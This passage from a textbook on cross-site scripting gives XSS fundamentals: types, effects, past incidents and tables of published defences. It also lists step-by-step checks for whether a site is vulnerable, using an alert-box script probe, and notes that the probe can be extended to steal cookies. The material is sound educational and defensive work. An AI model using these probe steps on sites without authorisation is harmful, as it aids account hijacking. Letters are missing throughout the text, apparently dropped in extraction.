Anti-phishing users from phishing attacks and prevents the
Chrome disclosure of sensitive information. It ensures safe
Extension surfng on the internet through notifying whether it
is a safe site or not.
(Continued)
48 ◾ Cross-Site Scripting Attacks

TABLE 2.2 (CONTINUED) Diferent Techniques to Prevent against Social


Media Attacks
S. R.
No. Solution Description
15. ZoneAlarm It is a sofware that protects against identity thef
Identity attack. It maintains credit score of the user as per
Protection the activity performed by the user, and if deviation
is found then it notifes to the user.
16. Norton Safe It is a service provided by Symantec, and it notifes to
Web the user about the malicious links and sites.
17. McAfee Social It is a mobile application developed for Facebook
Protection users. It enables them to maintain the privacy of
their posted photographs by restricting their
view and download to the persons selected by the
user.
18. Net Nanny A sofware for monitoring the activities of children
by the parents. It is used on Twitter, Facebook, and
other platforms.
19. MyPermissions It provides complete privacy protection to the user
Social Media through analyzing the information accessed by the
Privacy diferent applications, especially social networks. It
Protection generates alerts if some installed application tries to
access the sensitive information.
20. Privacy Scanner It is a scanner developed for Facebook users. It
for Facebook basically checks the user’s privacy settings and
informs to the user if some risky settings are
enabled that may cause harm to the user’s
privacy.

on these platforms. Terefore, in this chapter, we have presented


statistics related to the usage and popularity of social media and
the recent attack incidences on it. We have briefy explained dif-
ferent classes of attacks on social media that are harmful to the
social actors. Moreover, we have shown the trade-of between the
design goals of the social network and the privacy and security of
the user. Finally, we highlighted a variety of remedial solutions
that are available to defend against these attacks but are less efec-
tive without the user’s awareness.
Security Challenges in Social Networking    ◾   49

REFERENCES
1. Al-Qurishi, M., Al-Rakhami, M., Alamri, A., Alrubaian, M.,
Rahman, S. M. M., & Hossain, M. S. (2017). Sybil defense techniques
in online social networks: A survey. IEEE Access, 5, 1200–1219.
2. Almomani, A., Gupta, B. B., Wan, T. C., Altaher, A., & Manickam,
S. (2013). Phishing dynamic evolving neural fuzzy framework
for online detection zero-day phishing email. arXiv Preprint
ArXiv:1302.0629.
3. Benenson, Z., Gassmann, F., & Landwirth, R. (2017, April).
Unpacking spear phishing susceptibility. In International
Conference on Financial Cryptography and Data Security (pp. 610–
627). Springer, Cham.
4. Boulianne, S. (2019). Revolution in the making? Social media
efects across the globe. Information, Communication and Society,
22(1), 39–54.
5. Cai, Z., He, Z., Guan, X., & Li, Y. (2016). Collective data-saniti-
zation for preventing sensitive information inference attacks in
social networks. IEEE Transactions on Dependable and Secure
Computing, 15(4), 577–590.
6. Chaudhary, P., Gupta, B. B., & Gupta, S. (2016, March). Cross-
site scripting (XSS) worms in Online Social Network (OSN):
Taxonomy and defensive mechanisms. In 2016 3rd International
Conference on Computing for Sustainable Global Development
(INDIACom) (pp. 2131–2136). IEEE.
7. Ferrara, E., Varol, O., Davis, C., Menczer, F., & Flammini, A.
(2016). Te rise of social bots. Communications of the ACM, 59(7),
96–104.
8. Fire, M., Goldschmidt, R., & Elovici, Y. (2014). Online social net-
works: Treats and solutions. IEEE Communications Surveys and
Tutorials, 16(4), 2019–2036.
9. Gupta, B. B. (ed.). (2018). Computer and Cyber Security: Principles,
Algorithm, Applications, and Perspectives. CRC Press.
10. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the
browser-side context-aware sanitization of suspicious HTML5 code
for halting the DOM-based XSS vulnerabilities in cloud. International
Journal of Cloud Applications and Computing, 7(1), 1–31.
11. Gupta, B. B., & Sheng, Q. Z. (eds.). (2019). Machine Learning for
Computer and Cyber Security: Principle, Algorithms, and Practices.
CRC Press.
50 ◾ Cross-Site Scripting Attacks

12. Gupta, S., & Gugulothu, N. (2018). Secure nosql for the social net-
working and e-commerce based bigdata applications deployed in
cloud. International Journal of Cloud Applications and Computing,
8(2), 113–129.
13. Gupta, S., & Gupta, B. B. (2015). BDS: Browser dependent XSS sani-
tizer. In Handbook of Research on Securing Cloud-Based Databases
with Biometric Applications (pp. 174–191). IGI Global.
14. Gupta, S., & Gupta, B. B. (2015, May). PHP-sensor: A prototype
method to discover workfow violation and XSS vulnerabili-
ties in PHP web applications. In Proceedings of the 12th ACM
International Conference on Computing Frontiers (p. 59). ACM.
15. Gupta, S., & Gupta, B. B. (2016). JS-SAN: Defense mechanism for
HTML5‐based web applications against JavaScript code injec-
tion vulnerabilities. Security and Communication Networks, 9(11),
1477–1495.
16. Isaac, Mike, & Frenkel, Sheera. Facebook security breach exposes
accounts of 50 million users. [online] Available at: https://ww
w.nytimes.com/2018/09/28/technology/facebook-hack-data-breac
h.html
17. Jain, A. K., & Gupta, B. B. (2017). Phishing detection: Analysis of
visual similarity based approaches. Security and Communication
Networks, 2017.
18. Jiang, F., Fu, Y., Gupta, B. B., Lou, F., Rho, S., Meng, F., & Tian,
Z. (2018). Deep learning based multi-channel intelligent attack
detection for data security. IEEE Transactions on Sustainable
Computing.
19. Kamhoua, G. A., Pissinou, N., Iyengar, S. S., Beltran, J., Kamhoua,
C., Hernandez, B. L., Njilla, L., & Makki, A. P. (2017, June).
Preventing colluding identity clone attacks in online social net-
works. In 2017 IEEE 37th International Conference on Distributed
Computing Systems Workshops (ICDCSW) (pp. 187–192). IEEE.
20. Li, C., Zhang, Z., & Zhang, L. (2018). A novel authorization scheme
for multimedia social networks under cloud storage method by
using MA-CP-ABE. International Journal of Cloud Applications
and Computing, 8(3), 32–47.
21. Li, H., Chen, Q., Zhu, H., Ma, D., Wen, H., & Shen, X. S. (2017).
Privacy leakage via de-anonymization and aggregation in hetero-
geneous social networks. IEEE Transactions on Dependable and
Secure Computing.
Security Challenges in Social Networking    ◾   51

22. Li, H., Zhu, H., Du, S., Liang, X., & Shen, X. S. (2016). Privacy leakage of
location sharing in mobile social networks: Attacks and defense. IEEE
Transactions on Dependable and Secure Computing, 15(4), 646–660.
23. Liu, J., Tao, Y., & Bai, Q. (2016, August). Towards exposing cyber-
stalkers in online social networks. In Pacifc Rim International
Conference on Artifcial Intelligence (pp. 763–770). Springer, Cham.
24. Mocktoolah, A., & Khedo, K. K. (2015, December). Privacy
challenges in proximity based social networking: Techniques
& solutions. In 2015 International Conference on Computing,
Communication and Security (ICCCS) (pp. 1–8). IEEE.
25. Olakanmi, O. O., & Dada, A. (2019). An efcient privacy-pre-
serving approach for secure verifable outsourced computing on
untrusted platforms. International Journal of Cloud Applications
and Computing, 9(2), 79–98.
26. Patel, P., Kannoorpatti, K., Shanmugam, B., Azam, S., & Yeo, K.
C. (2017, January). A theoretical review of social media usage by
cyber-criminals. In 2017 International Conference on Computer
Communication and Informatics (ICCCI) (pp. 1–6). IEEE.
27. Pew Research Report Pew Research Center. (2018). Social Media
Use in 2018. [online] Available at: https://www.pewresearch.org/in
ternet/2018/03/01/social-media-use-in-2018/.
28. Rathore, S., Sharma, P. K., Loia, V., Jeong, Y. S., & Park, J. H. (2017).
Social network security: Issues, challenges, threats, and solutions.
Information Sciences, 421, 43–69.
29. Sahoo, S. R., & Gupta, B. B. (2019). Classifcation of various attacks
and their defence mechanism in online social networks: A survey.
Enterprise Information Systems, 13(6), 832–864.
30. Social media active users. [online] Available at: https://www.sta
tista.com/statistics/272014/global-social-networks-ranked-by
-number-of-users/.
31. Squicciarini, A., Rajtmajer, S., Liu, Y., & Grifn, C. (2015, August).
Identifcation and characterization of cyberbullying dynamics in
an online social network. In Proceedings of the 2015 IEEE/ACM
International Conference on Advances in Social Networks Analysis
and Mining 2015 (pp. 280–285). ACM.
32. Tian, Y., Yuan, J., & Yu, S. (2016, October). SBPA: Social behav-
ior based cross social network phishing attacks. In 2016 IEEE
Conference on Communications and Network Security (CNS) (pp.
366–367). IEEE.
52 ◾ Cross-Site Scripting Attacks

33. WhatsApp vulnerability. [online] Available at: https://www.hel


pnetsecurity.com/2019/05/14/whatsapp-faw-spyware-cve-2019-3
568/.
34. Xu, H., Sun, W., & Javaid, A. (2016, March). Efcient spam detec-
tion across online social networks. In 2016 IEEE International
Conference on Big Data Analysis (ICBDA) (pp. 1–6). IEEE.
35. Yan, G., Chen, G., Eidenbenz, S., & Li, N. (2011, March). Malware
propagation in online social networks: Nature, dynamics, and
defense implications. In Proceedings of the 6th ACM Symposium
on Information, Computer and Communications Security (pp. 196–
206). ACM.
36. Zhang, Z., Sun, R., Zhao, C., Wang, J., Chang, C. K., & Gupta,
B. B. (2017). CyVOD: A novel trinity multimedia social network
scheme. Multimedia Tools and Applications, 76(18), 18513–18529.
CHAPTER 3

Fundamentals of
Cross-Site Scripting
(XSS) Attack

I n this chapter, we present a comprehensive study of one of


the dangerous web application vulnerabilities, i.e. Cross-Site
Scripting (XSS). Tis chapter focuses on what is XSS, what are
the diferent favors of XSS attack, how the attacker can exploit
this vulnerability, what are the efects of the XSS attack, and lastly
we shed some light on the defensive techniques developed by the
researchers to defend against the XSS attack.

3.1 OVERVIEW OF CROSS-SITE


SCRIPTING (XSS) ATTACK
XSS comes under the category of code injection attack [4]. It is one
of the most severe security vulnerabilities present in the web appli-
cations. In this type of attack, adversary injects the judiciously
crafed malicious JavaScript code through the input parameters
at the client side. It is done in order to cause harmful actions by

53
54 ◾ Cross-Site Scripting Attacks

the web applications and accomplish the attacker’s objectives like


cookie stealing and session token thef or to launch other attacks
[8, 20]. Te origin of XSS attack is the inappropriate fltering of
the input text entered at the client side, which makes an attacker
to easily introduce the mischievous code into the OSN-based web
pages. Tese malicious scripts run at the client side in the user’s
web browser.

3.1.1 Steps to Exploit XSS Vulnerability


XSS arises because of the security faws in the HTML, JavaScript,
fash, AJAX, etc. When malicious code comes from a trusted
source, it is executed in the same way as the legitimate JavaScript
code, so the attacker is able to access the sensitive information of
the victim. Here, we describe the steps to examine whether a web
site is XSS vulnerable or not.

Step 1: Initially, explore the input feld available in a web site.


For instance, search box, comment box, or any form to be
flled by the user.

Step 2: Now, enter any string into the identifed feld and sub-
mit it. Search for this string in the source code of the web
page.
Step 3: Check if entered string is displayed on the web page, as
the result of step 2.

If it is displayed then the web site may be vulnerable to XSS


attack; otherwise it is not. Try for some diferent inputs in
steps 2 and 3.
Fundamentals of Cross-Site Scripting (XSS) Attack    ◾   55

Step 4: Now enter any malicious script say, <Script>


alert(“XSS”);</Script> and submit it.

Step 5: If the web page does not employ any sanitization tech-
nique, then malicious script will be executed in the browser.
Afer its successful execution, a dialog box will pop up,
refecting the XSS attack in the message body of box.

Tis indicates that the web site is exposed to XSS attack. By


extending the code, the attacker can steal the session token
and cookie information of the user and gain access to the
user’s account to launch diferent types of attacks.

3.1.2 Recent Incidences of XSS Attack


It is a problematic task to detect XSS attack due to the relatively
unchanged behavior of the browser and distinguish between
illicit JavaScript from the normal web content. Almost every
large online application system has been hit by the XSS worm.
Web sites such as Twitter, Facebook, YouTube, and Drupal have
been severely infected by the XSS attack. Table 3.1 illustrates the
recent incidences of the XSS attack, along with its consequences
[10, 12–14, 41].

3.2 EFFECTS OF XSS ATTACK


XSS not only enables the attackers to get their hands on the sensi-
tive information of the user, but also enables them to trigger more
56 ◾ Cross-Site Scripting Attacks

TABLE 3.1 Recent Incidences of XSS Attack


Web
Applications Year Efects
Evernote in 2018 Remote access to the victim’s computer.
Windows
Trend Micro 2017 Sensitive information disclosure.
OfceScan
Cisco Prime 2017 Gained access to confdential browser-based
Infrastructure information, which led to account hijacking.
Cisco ASA 2016 XSS attack infuenced the VPN portal of Cisco, and
VPN Portal consequently it led to credentials stealing of its
users.
Drupal 2016 Account hijacking.
Ebay 2016 Hackers used parasitic code in the login page to steal
the user’s login details, i.e. account hijacking.
Square API 2016 Te attacker injected malicious codes via login
entries, which resulted in the app takeover.
NASA 2015 XSS attack vectors were detected in NASA Scientifc
and Technical Information (STI) Order Form,
which caused disinformation to the users.
Facebook 2015 XSS bug was identifed in Facebook’s content
delivery network, which allowed hackers to take
over Facebook users’ accounts.
WordPress 2015 Information disclosure.
Paypal 2015 Stored XSS vulnerability found in e-payment services
permitted the hacker to insert malicious codes to
launch various types of attacks.
eBay 2014 Phishing.
UK Parliament 2014 Disinformation.
Web Site
RadEditor 2014 Improper sanitization of the user data resulted in the
HTML Editor thef of personal information and drive-by-
download attack.
Yahoo Mail 2013 Te hacker utilized DOM-based XSS attack to hijack
the users’ account.
Internet 2013 Te hacker bypassed anti-XSS flter employed in IE 8
Explorer and higher version through injecting malicious
JavaScript codes into the attribute created by the
attacker.
(Continued )
Fundamentals of Cross-Site Scripting (XSS) Attack    ◾   57

TABLE 3.1 (CONTINUED) Recent Incidences of XSS Attack


Web
Applications Year Efects
eBay 2012 Te attacker injected malicious codes in the product
listing and caused disinformation to its users.
McAfee 2012 XSS vulnerability allowed attackers to launch
drive-by-download attack.
Hotmail 2011 A security hole in Hotmail enabled attackers to steal
users and cookies and take control of their session.
Amazon 2010 XSS vulnerability permitted the attacker to steal
session IDs to take control over the user’s account,
when the user clicked on the malicious link.
Facebook 2010 XSS bug allowed hackers to hijack the user’s account
by posting malicious comments or posts.
Orkut 2010 Malicious group formation.
YouTube 2010 Drive-by-download.

advanced attacks using the victim’s machine. Table 3.2 highlights


the efects or impacts of XSS attack on the user [3].
Tese efects can harm the user catastrophically; therefore,
web applications or sofware should be developed and used with
proper attention, keeping the XSS faw in mind.

3.3 CLASSIFICATION OF XSS ATTACK


Tere are diferent ways to perform XSS attack. It can be launched
in three diferent ways and, therefore, can be classifed into three
categories [15]: persistent XSS attack, non-persistent XSS attack,
and DOM-based XSS attack.

3.3.1 Persistent XSS Attack


It is also known as stored XSS attack because the malicious script
permanently resides at the server end. In this attack, the attacker
permanently injects the maliciously crafed code into the server.
Afer this, any user who is visiting that web page with the injected
script gets infected by the XSS attack. It is the most dangerous XSS
attack among all types because the attacker injects the malicious
58 ◾ Cross-Site Scripting Attacks

TABLE 3.2 Efects of XSS Attack


Impacts Description
Cookie Stealing It is possible for an attacker to steal the cookie sent by the
server containing the session ID and take control of the
user’s account and may perform malicious activities like
sending spam messages to the user’s friends.
Account Te attackers can steal the sensitive information like
Hijacking fnancial account credentials or bank account login details
for the use of their benefts. If an account is hijacked, the
attacker has access to the OSN server and database system
and thus has complete control over the OSN web
application.
Misinformation Tis is a threat of credentialed misinformation. It may
include malwares which may track the user’s trafc
statistics, leading to the loss of privacy. Moreover, these may
also alter the content of the page, resulting in the loss of
integrity.
Denial of Data availability is an utmost important functionality
Service Attack provided by any enterprise. But XSS attack can be used to
[9, 34] redirect the user to some other fake web page so that he
can’t access the legitimate web site, whenever the user
makes a request to that web page. Tus the attacker
successfully launches the DDoS attack. Malicious scripts
may also crash the user browser by indefnitely blocking
the service of web application through pop-ups.
Browser Malicious scripts may redirect the user browser to the
Exploitation attacker’s site so that the attacker can take full control of
the user’s computer and use it to install malicious programs
like viruses, Trojan horses, etc. and may get access to the
user’s sensitive information.
Remote Control Once XSS attack vector gets executed on the victim’s
on System machine, it will open a way for the attacker to inject
diferent malwares that help in gaining remote access to the
victim’s system. Tereafer, the system may perform
malicious activity on the internet or become a part of the
network to launch diferent attacks such as botnet army.
Phishing [1, 19] When user clicks on the malicious link sent by the attacker it
may redirect the user to the fake web site designed by the
attacker to gain access to the sensitive information like the
user’s login credentials.
Fundamentals of Cross-Site Scripting (XSS) Attack    ◾   59

FIGURE 3.1 Persistent XSS attack.

code into the server just once and then afects a large number of
benign users with improper sanitization mechanisms. Figure 3.1
depicts the scenario of persistent XSS attack.

3.3.2 Non-Persistent Attack


It is also known as refected XSS attack as the malicious script
gets refected back in the response by the server. In this attack,
the attacker crafs malicious URL link and sends it to the vic-
tim using email or posts a fascinating message on social media.
When the user clicks on this link a request is sent to the server,
but as the request contains script that is not stored on the server,
it refects back the malicious script in response to the user. Now,
at the browser side, this script gets executed and the user gets
infected by the XSS attack. Figure 3.2 depicts the entire scenario
of this attack.
60 ◾ Cross-Site Scripting Attacks

FIGURE 3.2 Non-persistent XSS attack.

3.3.3 DOM-Based XSS Attack


Document Object Model (DOM)-based XSS attack is a client-side
XSS attack. DOM enables the browser to process the web content
represented by the web page. In this, the injected script is able to
alter the structure of the DOM. If it is not properly fltered then it
leads to the leakage of the sensitive information. DOM properties
like document.location, document.write, and document.anchors
may be used by the attacker to launch the XSS attack because these
properties are used to access and modify the HTML objects of the
web page. Tis attack is less explored by researchers as it is very
hard to detect and mitigate this attack. It requires a careful analysis
of the DOM tree while interpreting the web page or response ren-
dered by the server (Figure 3.3).

3.4 APPROACHES TO DEFEND AGAINST


XSS ATTACK
It has been discovered by diferent security organizations that XSS
is prevalent in the history of internet security attacks. It has been
Fundamentals of Cross-Site Scripting (XSS) Attack    ◾   61

FIGURE 3.3 DOM-based XSS attack.

discovered in almost 80 percent of the web applications including


the popular applications like MySpace, Cisco, NASA, Facebook,
Twitter, and so many. Terefore, it attracts the attention of diferent
researchers and security solution developers. Diferent solutions
have been designed on the basis of the type of XSS attacks these
solutions are dealing with. We have categorized these solutions or
approaches into four categories depending on the location of their
implementation: client-side approaches, server-side approaches,
client-server side approaches, and proxy-based approaches. We
will highlight only the major and most efective approaches in the
following subsections.
62 ◾ Cross-Site Scripting Attacks

TABLE 3.3 Client-Side Defensive Approaches against XSS Attack


Defensive
Approaches Methodology Limitations
MLPXSS [24] Authors have proposed a technique It is not tested on
based on ANN-Multilayer real-world web
Perceptron combined with the applications for
dynamic extraction of features for detecting XSS attack.
XSS mitigation. Tis technique
performs better when compared to
other machine-learning approaches.
TT-XSS [39] Authors have proposed an approach Tis technique
based on dynamic analysis and consumes more time
taint tracking at the browser end to to create attack vectors
detect DOM-based XSS attack. when payloads are
Here, vulnerabilities are detected complicated and
through analyzing the fow of cannot deal with two
suspicious script code execution. order inputs.
Khan et al. Authors have designed an approach Tis technique cannot
[21] that works as interceptor between detect DOM-based
the client and the server to process XSS attack.
the web page to detect malicious
code injection in the web page. Tis
technique divides the web page into
static and dynamic. Dynamic web
pages are tested for any vulnerability
by injecting attack payload. If the
content is displayed on the page
then it is prone to XSS attack.
Wang et al. Tis technique combines machine- Training task is
[37] learning classifers with improved challenging because if
n-gram approach to mitigate XSS features and instances
attack on the social networking are not sufcient,
platform. then it may not detect
malicious pages.
Guo et al. [7] Authors have designed an optimized It incurs performance
XSS attack vector repository that overhead while
can be used in detecting XSS attack creating optimized
by the detection tool. Mutation XSS repository.
rules are applied on initially
constructed XSS attack vector
dataset to make it optimized.
(Continued )
Fundamentals of Cross-Site Scripting (XSS) Attack    ◾   63

TABLE 3.3 (CONTINUED) Client-Side Defensive Approaches against XSS Attack


Defensive
Approaches Methodology Limitations
ETSSDetector Tis technique works by simulating It is not capable to
[29] the behavior of the browser. It detect DOM-based
interacts with the web page and XSS attack.
identifes the suspicious location;
then it tests its security by injecting
testing payload. If it executes then
it is vulnerable to XSS attack.
Vishnu et al. Te designed method is based on Prepared dataset is
[36] machine-learning classifers. Firstly, not updated
the dataset is prepared through automatically.
extracting and analyzing the URL Terefore, it may
parameter value and JavaScript bypass new attacking
value, and then it is used for the payload.
training of the classifers to detect
XSS attack.
Wang et al. Tis technique is based on machine- It cannot handle
[38] learning approach that uses DOM-based XSS
ADTree and AdaBoost classifers to attack.
detect XSS attack on social
networking sites.
Flashover Tis approach is designed to Static analysis is
[35] mitigate XSS attack in Adobe efective only in the
Flash-based applications. Tis detection of limited
approach also depends on static XSS vulnerability
analysis for the identifcation of sources. And it works
suspicious input feld and dynamic only for JavaScript
analysis to test these felds. If malicious code.
testing payload gets executed then
it is vulnerable to XSS attack.
Lekies et al. Authors have presented an approach Tis technique is not
[23] that will help in detecting DOM- efective against the
based XSS attack by using dynamic stored XSS attack.
taint tracking and context-sensitive
sanitization.
64 ◾ Cross-Site Scripting Attacks

TABLE 3.4 Server-Side Defensive Approaches against XSS Attack


Defensive
Approaches Methodology Limitations
Gupta et al. Authors have developed an Only Javascript
[16] approach that relies on finding context is taken into
the mismatch between inserted account, but XSS may
values and already-known also use other
values. It extracts JS code and contexts like URL
checks for any deviation from parameters and style
an already-known value for sheet features. Tis
that location. This helps in approach is
detecting code injection inefective against
vulnerabilities like XSS. these attack vectors.
DjangoChecker Authors have designed a dynamic It is restricted to web
[32] taint analysis tool named as application developed
DjangoChecker. Tis approach using Django and not
efectively identifes whether the able to detect
sanitizers’ primitives that are DOM-based XSS
already applied in the web attack.
application are correct at their
place. It also identifes the context
of attributes where these are
applied and examines the
correctness of implementing
sanitization as per the context. So
basically it checks whether
sanitization is context sensitive
or not.
Lalia et al. [22] Authors have proposed an Tis technique is not
approach to detect malicious efective against
script injection by using script partial script
features. Here, script features are injection and
extracted and then analyzed as to obfuscated script
how these are used for crafing injection.
malicious scripts. Ten, the
diference between suspicious
script and benign script is
identifed and used in detecting
XSS attack.
(Continued)
Fundamentals of Cross-Site Scripting (XSS) Attack    ◾   65

TABLE 3.4 (CONTINUED) Server-Side Defensive Approaches against XSS


Attack
Defensive
Approaches Methodology Limitations
Moniruzzaman Authors have designed a technique Tis technique
et al. [25] that helps in diferentiating the consumes more time
actual content of the web page due to feature
and injected data. Tis technique extraction and
is developed only for banking web sending the web page
sites and is based on machine- back to the server.
learning methods. Here, features
of DOM tree are extracted and
used to train the model.
KameleonFuzz It is a black-box-detection-based It requires resetting
[6] technique which uses fuzz testing the application which
for the automatic injection of is not practical for
malicious payload into the web live applications. And
application to activate the XSS it requires human
vulnerabilities. It basically extends interpretation for
LigRE model two steps further: attack vector
frst is the generation of malicious generation.
input, and second is the taint
analysis for the vulnerability
detection. It protects against
stored and refected XSS attack.
XSSDM [11] Authors designed an approach Tis technique
that is based on static analysis requires the manual
and pattern matching with placing of sanitized
context-sensitive sanitization to code in a web page.
protect against XSS attack.
Dong et al. [5] Tis approach is basically designed It focuses only on the
for the webmail system and also attack vectors related
possesses the capability to detect to the new tags and
XSS attack vectors that are built attribute of the
using new HTML5 features. Here, HTML5 and does not
attack vectors are injected at fve take into account
injection points in the webmail other suspicious
system, for testing purpose. Ten, it contexts.
is checked whether attack vectors
are sanitized correctly or not.
(Continued)
66 ◾ Cross-Site Scripting Attacks

TABLE 3.4 (CONTINUED) Server-Side Defensive Approaches against XSS


Attack
Defensive
Approaches Methodology Limitations
Ruse et al. [30] Tis technique is designed for It uses jCute concolic
JSP-based web applications and is testing which fails to
a concolic testing. It utilizes static discover test cases in
analysis with runtime which output
monitoring. It helps in variables may have a
identifying the relationship length of three
between input variables and characters or more.
output variables that pave the
way for the attacker to initiate
XSS attack.

3.4.1 Client-Side Approaches


Tese are the approaches, add-ons, or browser extensions that
work at the client side. It means these approaches get implemented
at the user’s machine. We have presented some of the efective
approaches as shown in Table 3.3.

3.4.2 Server-Side Approaches


Tese approaches execute at the server end and defend against
XSS attack. Table 3.4 highlights some of the major server-side
approaches to defend against XSS attack.

3.4.3 Combinational Approaches


Tese approaches have both modules to work on the client side
as well as server side. Table 3.5 presents the most promising
approaches of this category.

3.4.4 Proxy-Based Approaches


Tese approaches basically act as the proxy between the browser
and the server to defend against XSS attack. Some of these
approaches are highlighted in Table 3.6.
Fundamentals of Cross-Site Scripting (XSS) Attack    ◾   67

TABLE 3.5 Combinational Defensive Approaches against XSS Attack


Defensive
Approaches Methodology Limitations
Gupat et al. Authors have proposed Tis technique cannot
[17] client-server-based approach detect DOM-based XSS
that works by separating the attack as matching is
JavaScript code into an external performed between
fle and then analyzing it at the requesting parameters and
client side. In this technique, response parameters, and
suspicious variable context is DOM-based XSS is
determined and the decoding client-side vulnerability.
of JS is done and fnally
matches with the injected
values in the request. If any
match is found then it may
indicate XSS attack.
Chaudhary Authors have proposed a Tis approach does not
et al. [2] context-sensitive sanitization- provide protection against
based technique. In this the untrusted script code
approach, the context is available from an external
determined statically at the source.
server side and dynamically at
the client side. Afer this,
sanitizers’ primitives are applied
as per the context of the
vulnerable variable.
Panja et al. Authors have proposed a Tis technique requires
[27] technique named as Bufer client- and server-side
Based Cache Check to prevent code modifcation which
and detect XSS attack on the incurs performance
mobile browser. Cache usage overhead.
prevents the overhead of
providing script whitelist to the
web page, again and again.
Rather, the server stores verifed
scripts corresponding to the web
page when visited last time. So,
if any deviation is found, then it
indicates suspicious activity like
XSS. It saves time.
(Continued)
68 ◾ Cross-Site Scripting Attacks

TABLE 3.5 (CONTINUED) Combinational Defensive Approaches against


XSS Attack
Defensive
Approaches Methodology Limitations
Gupat et al. Authors have proposed an Tis approach may hinder
[18] approach to defend against the execution of benign
DOM-based XSS attack. JavaScript code if it does
Initially, the DOM tree is not match with the
constructed under normal whitelist.
conditions and scripting nodes
are extracted and whitelist is
prepared. Afer this, the DOM
tree is constructed for untrusted
web pages and extracts the
injected script code at identifed
nodes in the DOM tree.
Matching is performed with the
whitelist, and any mismatch
indicates XSS attack.
Nadji et al. It is based on client-server It is not efective to detect
[26] architecture to enforce the DOM-based XSS
document structure integrity. It attack and requires
combines runtime tracking and modifcation at the client
randomization to thwart XSS side and server side.
attack. Tis technique ensures
integrity constraint, i.e.
document structure integrity to
prevent malicious data for
altering the web application
content.

3.5 CHAPTER SUMMARY


As the internet is growing exponentially, it has intertwined into
the daily lives of the users as the virtual place where they get
faster services of any kind, anywhere, and at any time. It has been
adopted by every organization across the globe with the aim of
expanding its business. Such proliferation and usability brings
Fundamentals of Cross-Site Scripting (XSS) Attack    ◾   69

TABLE 3.6 Proxy-Based Defensive Approaches against XSS Attack


Defensive
Approaches Methodology Limitations
DEXTERJS It is a robust technique that It incurs
[28] efectively eliminates the DOM- performance
based XSS attack. It is based on overhead and does
taint tracking and reporting exploit not provide
to the client. Basically, it extracts the protection against
untrusted JavaScript code and then the non-scripting
tests it separately to check if any code.
infection takes place or not by
tracking the fow of its execution.
Depending upon the information
from logs, it generates test payload
to verify XSS vulnerability. Once all
vulnerabilities are identifed, then
the exploits are reported to the
client.
Stock et. al. Tis approach basically focuses on Each type of
[33] identifying the characteristics of suspicious fow
suspicious JavaScript code. It cannot be detected
utilizes taint tracking browsing by this method, for
system. Firstly, response web page is instance, fows that
stored in cache storage and then depend on some
HTML content is separated from stated conditions
JavaScript code. Afer this, JS code like URL parameter
is examined with the system and value.
some set of metrics are designed
that helps in measuring the efect of
each attacking fow.
Xiao et. al. Tis approach uses the dynamic It incurs
[40] analysis of JavaScript code performance
embedded in the web page. Tis overhead and
technique builds JS abstract syntax requires lots of
tree for internally representing the computational time
JavaScript code. Ten this tree is to perform its
forwarded to taint engine that functionalities.
examines this JS code to check
whether it attempts to gain access to
the sensitive information or not.
(Continued )
70 ◾ Cross-Site Scripting Attacks

TABLE 3.6 (CONTINUED) Proxy-Based Defensive Approaches against XSS


Attack
Defensive
Approaches Methodology Limitations
Scholte et. al. Authors have proposed an input Type learning can
[31] validation technique named as fail in the presence
IPAAS. Initially, it interrupts the of custom query
response web page and fetches all string formats. In
the parameters; then it identifes the this case, the IPAAS
context of these parameters. Tis parameter extractor
results in the generation of input might not be able to
validation policies, and fnally each reliably parse
response web page is examined parameter key-value
against these policies. If conditions pairs.
are not satisfed, then the request is
rejected; otherwise it is not.
Zhang et. al. It examines the implementation fow Tis technique is not
[42] of AJAX application to detect XSS efective against
attack. Initially, at the browser side, DOM-based XSS
it checks JavaScript code to design attack.
fnite state machine for the normal
fow of application. Ten, this
machine is embedded into proxy to
monitor the execution fow of each
injected script in the response web
page. If the execution fow does not
match with the fnite machine, then
it means suspicious fow and may
initiate XSS attack.

several security issues. One of the major serious concerns is XSS.


Terefore, the chapter has focused on elaborating the fundamen-
tals of XSS attack in a very compact and precise manner. We have
presented XSS categories with their efects and also provided
information related to the defensive approaches developed by the
researchers. Last but not the least, XSS cannot go away unless and
until the internet users are self-aware about their security and pri-
vacy and sofware developers develop secure sofware.
Fundamentals of Cross-Site Scripting (XSS) Attack    ◾   71

REFERENCES
1. Almomani, A., Gupta, B. B., Wan, T. C., Altaher, A., & Manickam, S.
(2013) Phishing dynamic evolving neural fuzzy framework for online
detection zero-day phishing email. arXiv preprint arXiv:1302.0629.
2. Chaudhary, P., Gupta, B. B., & Gupta, S. (2018). Defending the
OSN-based web applications from XSS attacks using dynamic
javascript code and content isolation. In Quality, IT and Business
Operations (pp. 107–119). Springer, Singapore.
3. Chaudhary, P., Gupta, S., & Gupta, B. B. (2016). Auditing defense
against XSS worms in online social network-based web applica-
tions. In Handbook of Research on Modern Cryptographic Solutions
for Computer and Cyber Security (pp. 216–245). IGI Global.
4. Cross site scripting, OWASP. [online] Available at: https://ww
w.owasp.org/index.php/Cross-site_Scripting (XSS).
5. Dong, G., Zhang, Y., Wang, X., Wang, P., & Liu, L. (2014). Detecting
cross site scripting vulnerabilities introduced by HTML5. In 2014
11th International Joint Conference on Computer Science and
Sofware Engineering (JCSSE). IEEE.
6. Duchene, F., Rawat, S., Richier, J.-L., & Groz, R. (2014).
KameleonFuzz: Evolutionary fuzzing for black-box XSS detection.
In Proceedings of the 4th ACM Conference on Data and Application
Security and Privacy (pp. 37–48). ACM.
7. Guo, X., Jin, S., & Zhang, Y. (2015). XSS vulnerability detection
using optimized attack vector repertory. In 2015 International
Conference On Cyber-Enabled Distributed Computing and
Knowledge Discovery (CyberC). IEEE.
8. Gupta, B. B. (ed.). (2018). Computer and Cyber Security: Principles,
Algorithm, Applications, and Perspectives. CRC Press.
9. Gupta, B. B., & Badve, O. P. (2017). Taxonomy of DoS and DDoS
attacks and desirable defense mechanism in a cloud comput-
ing environment. Neural Computing and Applications, 28(12),
3655–3682.
10. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the
browser-side context-aware sanitization of suspicious HTML5 code
for halting the DOM-based XSS vulnerabilities in cloud. International
Journal of Cloud Applications and Computing, 7(1), 1–31.
11. Gupta, M. K., Govil, M. C., Singh, G., & Sharma, P. (2015). XSSDM:
Towards detection and mitigation of cross-site scripting vulner-
abilities in web applications. In 2015 International Conference
72 ◾ Cross-Site Scripting Attacks

on Advances in Computing, Communications and Informatics


